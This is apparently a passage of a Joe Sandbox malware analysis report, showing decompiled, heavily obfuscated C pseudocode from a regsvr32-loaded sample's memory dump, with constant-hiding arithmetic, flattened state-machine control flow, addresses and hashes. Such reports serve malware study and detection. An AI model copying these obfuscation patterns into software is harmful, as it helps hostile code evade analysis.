                                                                                                                				_v2660 = _v2660 ^ 0x1108f31e;
                                                                                                                				_v2736 = 0x394e87;
                                                                                                                				_v2736 = _v2736 + 0xfffff2b1;
                                                                                                                				_v2736 = _v2736 + 0x57ed;
                                                                                                                				_v2736 = _v2736 * 0x6e;
                                                                                                                				_v2736 = _v2736 ^ 0x18b51b0c;
                                                                                                                				_v2616 = 0x598eb0;
                                                                                                                				_v2616 = _v2616 + 0x1b1c;
                                                                                                                				_v2616 = _v2616 ^ 0x005ac433;
                                                                                                                				_v2636 = 0xbba071;
                                                                                                                				_v2636 = _v2636 >> 3;
                                                                                                                				_v2636 = _v2636 ^ 0x0015d859;
                                                                                                                				_v2668 = 0xe8047f;
                                                                                                                				_v2668 = _v2668 >> 5;
                                                                                                                				_v2668 = _v2668 | 0xce4e65b3;
                                                                                                                				_v2668 = _v2668 ^ 0xce420057;
                                                                                                                				_v2788 = 0x3a8387;
                                                                                                                				_v2788 = _v2788 | 0xd19013cd;
                                                                                                                				_v2788 = _v2788 << 6;
                                                                                                                				_v2788 = _v2788 + 0xfb6c;
                                                                                                                				_v2788 = _v2788 ^ 0x6ea014bf;
                                                                                                                				_v2676 = 0x6ce937;
                                                                                                                				_t197 =  &_v2676; // 0x6ce937
                                                                                                                				_v2676 =  *_t197 / _t533;
                                                                                                                				_t203 =  &_v2676; // 0x6ce937
                                                                                                                				_t534 = 0x27;
                                                                                                                				_v2676 =  *_t203 / _t525;
                                                                                                                				_v2676 = _v2676 ^ 0x000ecd40;
                                                                                                                				_v2780 = 0xc2e9de;
                                                                                                                				_v2780 = _v2780 / _t534;
                                                                                                                				_t535 = 0x1b;
                                                                                                                				_v2780 = _v2780 / _t535;
                                                                                                                				_t536 = 9;
                                                                                                                				_v2780 = _v2780 / _t536;
                                                                                                                				_v2780 = _v2780 ^ 0x00012567;
                                                                                                                				_v2628 = 0x1ff059;
                                                                                                                				_v2628 = _v2628 >> 2;
                                                                                                                				_v2628 = _v2628 ^ 0x0007b3c9;
                                                                                                                				_v2692 = 0x3fd0ac;
                                                                                                                				_t537 = 0x67;
                                                                                                                				_v2692 = _v2692 * 0x16;
                                                                                                                				_v2692 = _v2692 + 0x3c9a;
                                                                                                                				_v2692 = _v2692 ^ 0x057da600;
                                                                                                                				_v2656 = 0x8b578e;
                                                                                                                				_v2656 = _v2656 ^ 0x7c84749f;
                                                                                                                				_v2656 = _v2656 ^ 0x7c0732b4;
                                                                                                                				_v2764 = 0x6f0346;
                                                                                                                				_v2764 = _v2764 >> 5;
                                                                                                                				_v2764 = _v2764 * 0x42;
                                                                                                                				_v2764 = _v2764 ^ 0x343722c1;
                                                                                                                				_v2764 = _v2764 ^ 0x34d5f76e;
                                                                                                                				_v2772 = 0x3cc9dd;
                                                                                                                				_v2772 = _v2772 >> 8;
                                                                                                                				_v2772 = _v2772 << 5;
                                                                                                                				_v2772 = _v2772 ^ 0x63b7b5d4;
                                                                                                                				_v2772 = _v2772 ^ 0x63bb2f04;
                                                                                                                				_v2620 = 0x310fdb;
                                                                                                                				_v2620 = _v2620 * 0x56;
                                                                                                                				_v2620 = _v2620 ^ 0x1070788e;
                                                                                                                				_v2612 = 0x12413;
                                                                                                                				_v2612 = _v2612 + 0xffffe6cc;
                                                                                                                				_v2612 = _v2612 ^ 0x0008dd99;
                                                                                                                				_v2640 = 0x7b7a34;
                                                                                                                				_v2640 = _v2640 | 0xe7cdc1d4;
                                                                                                                				_v2640 = _v2640 ^ 0xe7fb548d;
                                                                                                                				_v2648 = 0x960a31;
                                                                                                                				_v2648 = _v2648 | 0x113a4a82;
                                                                                                                				_v2648 = _v2648 ^ 0x11b59ced;
                                                                                                                				_v2704 = 0x41502d;
                                                                                                                				_v2704 = _v2704 + 0x80c0;
                                                                                                                				_v2704 = _v2704 + 0xffff0c99;
                                                                                                                				_v2704 = _v2704 ^ 0x0042838f;
                                                                                                                				_v2712 = 0xe11d52;
                                                                                                                				_v2712 = _v2712 / _t537;
                                                                                                                				_v2712 = _v2712 << 8;
                                                                                                                				_v2712 = _v2712 ^ 0x02279cb3;
                                                                                                                				_v2688 = 0xc7861a;
                                                                                                                				_v2688 = _v2688 | 0x2d38511c;
                                                                                                                				_t538 = 0x38;
                                                                                                                				_v2688 = _v2688 * 0x3c;
                                                                                                                				_v2688 = _v2688 ^ 0xc7f638fb;
                                                                                                                				_v2740 = 0xe39dba;
                                                                                                                				_v2740 = _v2740 / _t538;
                                                                                                                				_v2740 = _v2740 * 0x6a;
                                                                                                                				_v2740 = _v2740 + 0xffff55ab;
                                                                                                                				_v2740 = _v2740 ^ 0x01abda38;
                                                                                                                				_v2748 = 0xd1f198;
                                                                                                                				_v2748 = _v2748 >> 0xa;
                                                                                                                				_v2748 = _v2748 >> 7;
                                                                                                                				_v2748 = _v2748 << 0x10;
                                                                                                                				_v2748 = _v2748 ^ 0x006e7c4d;
                                                                                                                				_v2696 = 0x30d40c;
                                                                                                                				_v2696 = _v2696 >> 0xe;
                                                                                                                				_v2696 = _v2696 + 0x60fe;
                                                                                                                				_v2696 = _v2696 ^ 0x00076bcb;
                                                                                                                				_v2724 = 0xde50ca;
                                                                                                                				_v2724 = _v2724 << 5;
                                                                                                                				_v2724 = _v2724 | 0x13de4b45;
                                                                                                                				_v2724 = _v2724 >> 3;
                                                                                                                				_v2724 = _v2724 ^ 0x0370e8ba;
                                                                                                                				_v2632 = 0x6fb4e2;
                                                                                                                				_v2632 = _v2632 << 0xa;
                                                                                                                				_v2632 = _v2632 ^ 0xbedb2252;
                                                                                                                				_v2680 = 0x391472;
                                                                                                                				_t539 = 0x60;
                                                                                                                				_v2680 = _v2680 * 0x50;
                                                                                                                				_v2680 = _v2680 * 0x7f;
                                                                                                                				_v2680 = _v2680 ^ 0xd95a4585;
                                                                                                                				_v2732 = 0x43aaa1;
                                                                                                                				_v2732 = _v2732 / _t539;
                                                                                                                				_v2732 = _v2732 + 0xfffff83e;
                                                                                                                				_v2732 = _v2732 | 0xd088b622;
                                                                                                                				_v2732 = _v2732 ^ 0xd0822457;
                                                                                                                				_v2664 = 0xd2d120;
                                                                                                                				_t540 = 0xa;
                                                                                                                				_t509 = _v2664 / _t540;
                                                                                                                				_v2664 = _t509;
                                                                                                                				_v2664 = _v2664 | 0x0130d72a;
                                                                                                                				_v2664 = _v2664 ^ 0x013183f8;
                                                                                                                				_v2672 = 0xf6d933;
                                                                                                                				_v2672 = _v2672 ^ 0xf71e6f53;
                                                                                                                				_v2672 = _v2672 ^ 0x218b367a;
                                                                                                                				_v2672 = _v2672 ^ 0xd6691ebb;
                                                                                                                				_v2716 = 0x3f87a6;
                                                                                                                				_v2716 = _v2716 << 5;
                                                                                                                				_v2716 = _v2716 ^ 0xe267617b;
                                                                                                                				_v2716 = _v2716 + 0xfffff440;
                                                                                                                				_v2716 = _v2716 ^ 0xe594c8d8;
                                                                                                                				_v2624 = 0xab7401;
                                                                                                                				_v2624 = _v2624 + 0x89d4;
                                                                                                                				_v2624 = _v2624 ^ 0x00aaff96;
                                                                                                                				while(_t595 != 0x864531) {
                                                                                                                					if(_t595 == 0x2b81e36) {
                                                                                                                						_t595 = 0x74f4821;
                                                                                                                						continue;
                                                                                                                					} else {
                                                                                                                						_t606 = _t595 - 0x74f4821;
                                                                                                                						if(_t595 != 0x74f4821) {
                                                                                                                							L8:
                                                                                                                							__eflags = _t595 - 0x6c3f2c3;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							E001C0575(_v2708, _v2784, _t606, _t540,  &_v2600, _v2752);
                                                                                                                							 *((short*)(E001A2263( &_v2600, _v2644, _v2776, _v2720))) = 0;
                                                                                                                							E001B9054(_v2768,  &_v1560, _t606, _v2604, _v2652, _v2744);
                                                                                                                							_push(_v2684);
                                                                                                                							_push(0x1a1188);
                                                                                                                							_push(_v2728);
                                                                                                                							E001B8EB3( &_v2600, _t606, _v2608, _v2760, _v2792,  &_v2080, _v2660, E001BF5D9(_v2760, _v2700, _t606), _v2736);
                                                                                                                							E001BF94B(_t521, _v2616, _v2636, _v2668, _v2788);
                                                                                                                							_t540 =  &_v2080;
                                                                                                                							_t509 = E001C05F6( &_v2080, _t594, _v2676, _v2780, _v2628, _v2692);
                                                                                                                							_t599 =  &(_t599[0x19]);
                                                                                                                							if(_t509 != 0) {
                                                                                                                								_t595 = 0x864531;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t509;
                                                                                                                				}
                                                                                                                				_t444 =  &_v2764; // 0x6e7c4d
                                                                                                                				E001A3466(_v2756, _v2656, _t540, _t540,  &_v1040,  *_t444, _t540, _v2772, _v2620, _v2612);
                                                                                                                				_push(_v2712);
                                                                                                                				_push(0x1a1228);
                                                                                                                				_push(_v2704);
                                                                                                                				_t596 = E001BF5D9(_v2640, _v2648, __eflags);
                                                                                                                				E001B8EB3( &_v1040, __eflags, _v2688, _v2640, _v2740,  &_v520, _v2748, _t512, _v2696);
                                                                                                                				E001BF94B(_t596, _v2724, _v2632, _v2680, _v2732);
                                                                                                                				__eflags = 0;
                                                                                                                				_t540 = _v2664;
                                                                                                                				_t509 = E001B4E54(_v2664, 0, 0,  &_v520, 0, _v2672, 0, _v2716, _t596, _v2624);
                                                                                                                				_t599 =  &(_t599[0x1c]);
                                                                                                                				_t595 = 0x6c3f2c3;
                                                                                                                				goto L8;
                                                                                                                			}









































































                                                                                                                0x001ba1d5
                                                                                                                0x001ba21c
                                                                                                                0x001ba23c
                                                                                                                0x001ba24a
                                                                                                                0x001ba263
                                                                                                                0x001ba268
                                                                                                                0x001ba26d
                                                                                                                0x001ba273
                                                                                                                0x00000000
                                                                                                                0x001ba273
                                                                                                                0x001ba26d
                                                                                                                0x001ba167
                                                                                                                0x001ba378
                                                                                                                0x001ba378
                                                                                                                0x001ba29b
                                                                                                                0x001ba2ad
                                                                                                                0x001ba2b2
                                                                                                                0x001ba2b9
                                                                                                                0x001ba2be
                                                                                                                0x001ba2e2
                                                                                                                0x001ba308
                                                                                                                0x001ba325
                                                                                                                0x001ba334
                                                                                                                0x001ba34b
                                                                                                                0x001ba355
                                                                                                                0x001ba35a
                                                                                                                0x001ba35d
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "Y$-PA$4z{$7l$M|nT$W$\f1i${ag$W$]
                                                                                                                • API String ID: 0-1096841937
                                                                                                                • Opcode ID: 3156205b1c79eb181d8ad058a095d7d3ac9c51357d7c30ef6836e9f9165450e3
                                                                                                                • Instruction ID: 1e3087faff54dca7d7dbad4b4db85757516fcf07f364668b195a598418ae3142
                                                                                                                • Opcode Fuzzy Hash: 3156205b1c79eb181d8ad058a095d7d3ac9c51357d7c30ef6836e9f9165450e3
                                                                                                                • Instruction Fuzzy Hash: E522D171508380DFE3A9CF65C54AA9BFBE2BBC4708F108A1DE1D996260D7B58949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001A2710(intOrPtr* __ecx) {
                                                                                                                				intOrPtr* _v4;
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				void* _t393;
                                                                                                                				void* _t396;
                                                                                                                				void* _t404;
                                                                                                                				intOrPtr _t405;
                                                                                                                				void* _t410;
                                                                                                                				signed int _t413;
                                                                                                                				signed int _t414;
                                                                                                                				intOrPtr* _t441;
                                                                                                                				void* _t445;
                                                                                                                				signed int* _t446;
                                                                                                                
                                                                                                                				_t446 =  &_v180;
                                                                                                                				_v168 = 0x59659b;
                                                                                                                				_v168 = _v168 | 0x98495c95;
                                                                                                                				_v168 = _v168 * 0x2b;
                                                                                                                				_t441 = __ecx;
                                                                                                                				_v168 = _v168 | 0x53e54cf1;
                                                                                                                				_t445 = 0;
                                                                                                                				_v168 = _v168 ^ 0xd7ed5df5;
                                                                                                                				_t410 = 0x65ddf49;
                                                                                                                				_v72 = 0xa6314f;
                                                                                                                				_v4 = __ecx;
                                                                                                                				_v72 = _v72 * 0x3a;
                                                                                                                				_v72 = _v72 + 0xcf4d;
                                                                                                                				_v72 = _v72 ^ 0x25a7fb33;
                                                                                                                				_v164 = 0x7e3ee;
                                                                                                                				_v164 = _v164 + 0xffffbebb;
                                                                                                                				_v164 = _v164 << 4;
                                                                                                                				_v164 = _v164 >> 7;
                                                                                                                				_v164 = _v164 ^ 0x0000f455;
                                                                                                                				_v156 = 0x8c5b8f;
                                                                                                                				_v156 = _v156 >> 6;
                                                                                                                				_v156 = _v156 << 4;
                                                                                                                				_v156 = _v156 ^ 0x7fb0e770;
                                                                                                                				_v156 = _v156 ^ 0x7f93f190;
                                                                                                                				_v20 = 0x2734a0;
                                                                                                                				_v20 = _v20 + 0x711a;
                                                                                                                				_v20 = _v20 ^ 0x0027a5ba;
                                                                                                                				_v32 = 0xd3ef24;
                                                                                                                				_v32 = _v32 | 0x3c96abc4;
                                                                                                                				_v32 = _v32 ^ 0x3cd6bfc0;
                                                                                                                				_v100 = 0x4c9037;
                                                                                                                				_v100 = _v100 * 0x12;
                                                                                                                				_v100 = _v100 ^ 0xc27fa940;
                                                                                                                				_v100 = _v100 ^ 0xc71847ef;
                                                                                                                				_v68 = 0xa7e3e1;
                                                                                                                				_v68 = _v68 >> 0xd;
                                                                                                                				_v68 = _v68 | 0xb27e4612;
                                                                                                                				_v68 = _v68 ^ 0xb27287c0;
                                                                                                                				_v148 = 0x3f4e1b;
                                                                                                                				_v148 = _v148 + 0x5679;
                                                                                                                				_v148 = _v148 << 0xd;
                                                                                                                				_v148 = _v148 << 0xb;
                                                                                                                				_v148 = _v148 ^ 0x940c92e7;
                                                                                                                				_v88 = 0x6b38c6;
                                                                                                                				_v88 = _v88 | 0xf30843da;
                                                                                                                				_v88 = _v88 + 0xffff5c59;
                                                                                                                				_v88 = _v88 ^ 0xf36e812a;
                                                                                                                				_v96 = 0x351a34;
                                                                                                                				_v96 = _v96 + 0x9fcc;
                                                                                                                				_v96 = _v96 << 4;
                                                                                                                				_v96 = _v96 ^ 0x035ac0a2;
                                                                                                                				_v48 = 0xcebbc2;
                                                                                                                				_v48 = _v48 + 0xffff35e1;
                                                                                                                				_v48 = _v48 ^ 0x00cc7519;
                                                                                                                				_v16 = 0xd0f52a;
                                                                                                                				_v16 = _v16 >> 9;
                                                                                                                				_v16 = _v16 ^ 0x000478e1;
                                                                                                                				_v44 = 0xff389d;
                                                                                                                				_v44 = _v44 | 0x80dbed3e;
                                                                                                                				_v44 = _v44 ^ 0x80f0fe7c;
                                                                                                                				_v80 = 0xee2b08;
                                                                                                                				_v80 = _v80 * 0x1e;
                                                                                                                				_v80 = _v80 * 9;
                                                                                                                				_v80 = _v80 ^ 0xfb3beca4;
                                                                                                                				_v176 = 0x9c4d64;
                                                                                                                				_v176 = _v176 + 0x6779;
                                                                                                                				_v176 = _v176 >> 7;
                                                                                                                				_v176 = _v176 * 0x4e;
                                                                                                                				_v176 = _v176 ^ 0x0056d06b;
                                                                                                                				_v180 = 0x2ba105;
                                                                                                                				_v180 = _v180 + 0xffff28cd;
                                                                                                                				_v180 = _v180 >> 0xb;
                                                                                                                				_v180 = _v180 + 0x633b;
                                                                                                                				_v180 = _v180 ^ 0x000d9041;
                                                                                                                				_v28 = 0x446d00;
                                                                                                                				_v28 = _v28 >> 0xc;
                                                                                                                				_v28 = _v28 ^ 0x000b6aec;
                                                                                                                				_v64 = 0xe45e7b;
                                                                                                                				_v64 = _v64 + 0x6f2f;
                                                                                                                				_v64 = _v64 | 0x7a241b84;
                                                                                                                				_v64 = _v64 ^ 0x7ae55bf2;
                                                                                                                				_v36 = 0xef1165;
                                                                                                                				_v36 = _v36 >> 0xd;
                                                                                                                				_v36 = _v36 ^ 0x00009995;
                                                                                                                				_v160 = 0xa971e5;
                                                                                                                				_v160 = _v160 >> 0x10;
                                                                                                                				_v160 = _v160 | 0x6a5dff56;
                                                                                                                				_v160 = _v160 + 0xa6a;
                                                                                                                				_v160 = _v160 ^ 0x6a580dcb;
                                                                                                                				_v136 = 0x3e547b;
                                                                                                                				_v136 = _v136 ^ 0x308871cd;
                                                                                                                				_t413 = 0x77;
                                                                                                                				_v136 = _v136 * 0x6a;
                                                                                                                				_v136 = _v136 >> 0xa;
                                                                                                                				_v136 = _v136 ^ 0x000711df;
                                                                                                                				_v144 = 0x4f010f;
                                                                                                                				_v144 = _v144 * 0x21;
                                                                                                                				_v144 = _v144 + 0xeaa2;
                                                                                                                				_v144 = _v144 >> 5;
                                                                                                                				_v144 = _v144 ^ 0x005edee1;
                                                                                                                				_v104 = 0x44e9f4;
                                                                                                                				_v104 = _v104 << 6;
                                                                                                                				_v104 = _v104 >> 0xb;
                                                                                                                				_v104 = _v104 ^ 0x00085e98;
                                                                                                                				_v152 = 0x1ba241;
                                                                                                                				_v152 = _v152 + 0xff60;
                                                                                                                				_v152 = _v152 << 7;
                                                                                                                				_v152 = _v152 ^ 0x82eca48f;
                                                                                                                				_v152 = _v152 ^ 0x8cb0e99d;
                                                                                                                				_v56 = 0x7a6bc3;
                                                                                                                				_v56 = _v56 | 0x93e67637;
                                                                                                                				_v56 = _v56 + 0x2da9;
                                                                                                                				_v56 = _v56 ^ 0x93f0bf64;
                                                                                                                				_v172 = 0x8c8286;
                                                                                                                				_v172 = _v172 >> 5;
                                                                                                                				_v172 = _v172 ^ 0x42c2470c;
                                                                                                                				_v172 = _v172 + 0xffff02fc;
                                                                                                                				_v172 = _v172 ^ 0x42c8573d;
                                                                                                                				_v60 = 0x25c2ad;
                                                                                                                				_v60 = _v60 >> 0xf;
                                                                                                                				_v60 = _v60 + 0x911;
                                                                                                                				_v60 = _v60 ^ 0x0005c1ac;
                                                                                                                				_v116 = 0x6ecdd3;
                                                                                                                				_v116 = _v116 * 0x79;
                                                                                                                				_v116 = _v116 * 0x35;
                                                                                                                				_v116 = _v116 * 0x74;
                                                                                                                				_v116 = _v116 ^ 0xc0488b75;
                                                                                                                				_v40 = 0x28ed11;
                                                                                                                				_v40 = _v40 + 0x8779;
                                                                                                                				_v40 = _v40 ^ 0x0024254d;
                                                                                                                				_v92 = 0xca537b;
                                                                                                                				_v92 = _v92 << 1;
                                                                                                                				_v92 = _v92 | 0x31ea098b;
                                                                                                                				_v92 = _v92 ^ 0x31fd2b22;
                                                                                                                				_v124 = 0xc18ad1;
                                                                                                                				_v124 = _v124 + 0xf8f0;
                                                                                                                				_v124 = _v124 + 0xd15d;
                                                                                                                				_v124 = _v124 / _t413;
                                                                                                                				_v124 = _v124 ^ 0x0006dd8a;
                                                                                                                				_v24 = 0x9933e6;
                                                                                                                				_v24 = _v24 | 0x21a6ea10;
                                                                                                                				_v24 = _v24 ^ 0x21bdeba3;
                                                                                                                				_v140 = 0x501828;
                                                                                                                				_v140 = _v140 >> 0xa;
                                                                                                                				_v140 = _v140 ^ 0xcc9d183e;
                                                                                                                				_v140 = _v140 << 0xe;
                                                                                                                				_v140 = _v140 ^ 0x430732f0;
                                                                                                                				_v52 = 0xf4243d;
                                                                                                                				_v52 = _v52 + 0xe76b;
                                                                                                                				_v52 = _v52 ^ 0x00ff3a3a;
                                                                                                                				_v76 = 0xeacad3;
                                                                                                                				_v76 = _v76 >> 3;
                                                                                                                				_v76 = _v76 << 0xd;
                                                                                                                				_v76 = _v76 ^ 0xab2caf0b;
                                                                                                                				_v12 = 0xaa955a;
                                                                                                                				_v12 = _v12 + 0x8e70;
                                                                                                                				_v12 = _v12 ^ 0x00af2781;
                                                                                                                				_v84 = 0x8d6e17;
                                                                                                                				_v84 = _v84 | 0xd6e33bc8;
                                                                                                                				_v84 = _v84 << 1;
                                                                                                                				_v84 = _v84 ^ 0xadd45833;
                                                                                                                				_v108 = 0x2aab73;
                                                                                                                				_v108 = _v108 >> 2;
                                                                                                                				_t414 = 0x3a;
                                                                                                                				_v108 = _v108 / _t414;
                                                                                                                				_v108 = _v108 ^ 0x0009697d;
                                                                                                                				_v132 = 0x19904;
                                                                                                                				_v132 = _v132 >> 5;
                                                                                                                				_v132 = _v132 * 0x7d;
                                                                                                                				_v132 = _v132 >> 6;
                                                                                                                				_v132 = _v132 ^ 0x000b557a;
                                                                                                                				_v112 = 0x4318ce;
                                                                                                                				_v112 = _v112 ^ 0xb8e53099;
                                                                                                                				_v112 = _v112 + 0xffff40be;
                                                                                                                				_v112 = _v112 ^ 0xb8abcfbd;
                                                                                                                				_v120 = 0x748122;
                                                                                                                				_v120 = _v120 * 0x23;
                                                                                                                				_v120 = _v120 * 0x56;
                                                                                                                				_v120 = _v120 + 0x4ab7;
                                                                                                                				_v120 = _v120 ^ 0x59dce155;
                                                                                                                				_v128 = 0xd31fe6;
                                                                                                                				_v128 = _v128 ^ 0x39aa7bb1;
                                                                                                                				_v128 = _v128 ^ 0x1455549a;
                                                                                                                				_v128 = _v128 * 0x62;
                                                                                                                				_v128 = _v128 ^ 0x4aecef1a;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t393 = 0xc8cbe9b;
                                                                                                                					do {
                                                                                                                						if(_t410 == 0x65ddf49) {
                                                                                                                							_t410 = 0x8517f81;
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							if(_t410 == 0x6e632eb) {
                                                                                                                								E001B2519(_v112, _v8, _v120, _v20, _v128);
                                                                                                                							} else {
                                                                                                                								if(_t410 == 0x8517f81) {
                                                                                                                									_push(_v148);
                                                                                                                									_push(0x1a1604);
                                                                                                                									_push(_v68);
                                                                                                                									_t396 = E001BF5D9(_v32, _v100, __eflags);
                                                                                                                									_push(_v16);
                                                                                                                									_push(0x1a1504);
                                                                                                                									_push(_v48);
                                                                                                                									__eflags = E001AD2C9(_t396, _v168, _v44, _v80,  &_v8, _v176, _v180, E001BF5D9(_v88, _v96, __eflags)) - _v72;
                                                                                                                									_t410 =  ==  ? 0xc8cbe9b : 0xed06072;
                                                                                                                									E001BF94B(_t396, _v28, _v64, _v36, _v160);
                                                                                                                									E001BF94B(_t397, _v136, _v144, _v104, _v152);
                                                                                                                									_t441 = _v4;
                                                                                                                									_t446 =  &(_t446[0x12]);
                                                                                                                									_t393 = 0xc8cbe9b;
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_t453 = _t410 - _t393;
                                                                                                                									if(_t410 != _t393) {
                                                                                                                										goto L9;
                                                                                                                									} else {
                                                                                                                										_push(_v116);
                                                                                                                										_push(0x1a1544);
                                                                                                                										_push(_v60);
                                                                                                                										_t404 = E001BF5D9(_v56, _v172, _t453);
                                                                                                                										_t405 =  *0x1c4208; // 0x0
                                                                                                                										E001A866C(_v40,  *((intOrPtr*)(_t441 + 4)), _v92, _v124, _t405 + 0x14, _v24, _v8, _v164,  *_t441, _v140, _v52, _v76, _v56, _t404);
                                                                                                                										_t410 = 0x6e632eb;
                                                                                                                										_t445 =  ==  ? 1 : _t445;
                                                                                                                										E001BF94B(_t404, _v12, _v84, _v108, _v132);
                                                                                                                										_t446 =  &(_t446[0x12]);
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L12:
                                                                                                                						return _t445;
                                                                                                                						L9:
                                                                                                                						__eflags = _t410 - 0xed06072;
                                                                                                                					} while (__eflags != 0);
                                                                                                                					goto L12;
                                                                                                                				}
                                                                                                                			}


























































                                                                                                                0x001a2b77
                                                                                                                0x001a2b7f
                                                                                                                0x001a2b8d
                                                                                                                0x001a2b91
                                                                                                                0x001a2b99
                                                                                                                0x001a2ba4
                                                                                                                0x001a2baf
                                                                                                                0x001a2bba
                                                                                                                0x001a2bc2
                                                                                                                0x001a2bc7
                                                                                                                0x001a2bd1
                                                                                                                0x001a2bd6
                                                                                                                0x001a2bde
                                                                                                                0x001a2be9
                                                                                                                0x001a2bf4
                                                                                                                0x001a2bff
                                                                                                                0x001a2c07
                                                                                                                0x001a2c0c
                                                                                                                0x001a2c11
                                                                                                                0x001a2c19
                                                                                                                0x001a2c24
                                                                                                                0x001a2c2f
                                                                                                                0x001a2c3a
                                                                                                                0x001a2c42
                                                                                                                0x001a2c4a
                                                                                                                0x001a2c4e
                                                                                                                0x001a2c56
                                                                                                                0x001a2c5e
                                                                                                                0x001a2c69
                                                                                                                0x001a2c6c
                                                                                                                0x001a2c70
                                                                                                                0x001a2c78
                                                                                                                0x001a2c80
                                                                                                                0x001a2c8a
                                                                                                                0x001a2c8e
                                                                                                                0x001a2c93
                                                                                                                0x001a2c9b
                                                                                                                0x001a2ca3
                                                                                                                0x001a2cab
                                                                                                                0x001a2cbb
                                                                                                                0x001a2cc3
                                                                                                                0x001a2cd0
                                                                                                                0x001a2cd9
                                                                                                                0x001a2cdd
                                                                                                                0x001a2ce5
                                                                                                                0x001a2ced
                                                                                                                0x001a2cf5
                                                                                                                0x001a2cfd
                                                                                                                0x001a2d0a
                                                                                                                0x001a2d0e
                                                                                                                0x001a2d16
                                                                                                                0x001a2d16
                                                                                                                0x001a2d16
                                                                                                                0x001a2d1b
                                                                                                                0x001a2d21
                                                                                                                0x001a2ec9
                                                                                                                0x00000000
                                                                                                                0x001a2d27
                                                                                                                0x001a2d2d
                                                                                                                0x001a2ef6
                                                                                                                0x001a2d33
                                                                                                                0x001a2d39
                                                                                                                0x001a2df2
                                                                                                                0x001a2df6
                                                                                                                0x001a2dfb
                                                                                                                0x001a2e0d
                                                                                                                0x001a2e12
                                                                                                                0x001a2e1b
                                                                                                                0x001a2e20
                                                                                                                0x001a2e71
                                                                                                                0x001a2e85
                                                                                                                0x001a2e96
                                                                                                                0x001a2eb3
                                                                                                                0x001a2eb8
                                                                                                                0x001a2ebf
                                                                                                                0x001a2ec2
                                                                                                                0x00000000
                                                                                                                0x001a2d3f
                                                                                                                0x001a2d3f
                                                                                                                0x001a2d41
                                                                                                                0x00000000
                                                                                                                0x001a2d47
                                                                                                                0x001a2d47
                                                                                                                0x001a2d4b
                                                                                                                0x001a2d50
                                                                                                                0x001a2d62
                                                                                                                0x001a2d94
                                                                                                                0x001a2db2
                                                                                                                0x001a2dc6
                                                                                                                0x001a2dd2
                                                                                                                0x001a2de5
                                                                                                                0x001a2dea
                                                                                                                0x00000000
                                                                                                                0x001a2dea
                                                                                                                0x001a2d41
                                                                                                                0x001a2d39
                                                                                                                0x001a2d2d
                                                                                                                0x001a2f00
                                                                                                                0x001a2f0a
                                                                                                                0x001a2ece
                                                                                                                0x001a2ece
                                                                                                                0x001a2ece
                                                                                                                0x00000000
                                                                                                                0x001a2eda

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: /o$;c$M%$$j$k$yV$yg${T>${^$}i
                                                                                                                • API String ID: 0-1421433962
                                                                                                                • Opcode ID: 25daab60148e35e9f5fc9a52453fdee49a75672e992df344f0ea4402d3743765
                                                                                                                • Instruction ID: d571dce7c94fbd4e3708940bba9a5d126c9bb19ef796459dcc1653dbd919b2ba
                                                                                                                • Opcode Fuzzy Hash: 25daab60148e35e9f5fc9a52453fdee49a75672e992df344f0ea4402d3743765
                                                                                                                • Instruction Fuzzy Hash: CB12FC715093809FD3A8CF65C58AA8BBBF1FBD5758F108A1CE5DA86260C7B58949CF03
                                                                                                                Uniqueness

